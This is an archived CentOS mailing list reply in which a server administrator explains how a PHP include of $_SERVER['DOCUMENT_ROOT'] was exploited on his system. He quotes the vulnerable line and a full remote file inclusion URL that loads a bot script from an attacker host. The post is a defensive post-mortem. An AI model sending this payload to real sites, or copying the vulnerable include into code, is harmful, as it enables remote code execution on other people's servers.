On Tuesday 12 August 2008 12:18, Rainer Duffner wrote: > (I think it requires both register_globals and allow_url_fopen to be on, > but I'm not sure if you can't get it to work with only allow_url_fopen....) as I just found out, it can, as long as the PHP developer was even more naive than usual. The offending line was: require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php"); then a request like: http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit e.es/bot.txt will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php";, which is good enough. And yeah this works with register_globals off, which surprised me. And also surprised that mod_security has no problem with that URL. I am going to raise the issue with them. cheers Sam _______________________________________________ CentOS mailing list CentOS@xxxxxxxxxx http://lists.centos.org/mailman/listinfo/centos
Re: mystery process "unit"
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
- To: CentOS mailing list <centos@xxxxxxxxxx>
- Subject: Re: mystery process "unit"
- From: sbeam <sbeam@xxxxxxxxxxxxxx>
- Date: Tue, 12 Aug 2008 12:28:08 -0400
- Delivered-to: centos@xxxxxxxxxx
- In-reply-to: <48A1B7E5.9030005@xxxxxxxxxxxxxxx>
- References: <200808120856.20749.sbeam@xxxxxxxxxxxxxx> <200808121208.54928.sbeam@xxxxxxxxxxxxxx> <48A1B7E5.9030005@xxxxxxxxxxxxxxx>
- User-agent: KMail/1.9.4
- Follow-Ups:
- Re: mystery process "unit"
- From: Jeff Kinz
- Re: mystery process "unit"
- References:
- mystery process "unit"
- From: sbeam
- Re: mystery process "unit"
- From: sbeam
- Re: mystery process "unit"
- From: Rainer Duffner
- mystery process "unit"
- Prev by Date: Re: Mirroring Hard Drive
- Next by Date: RE: gcc editor for newbie (Emacs or vim or ?)
- Previous by thread: Re: mystery process "unit"
- Next by thread: Re: mystery process "unit"
- Index(es):
 |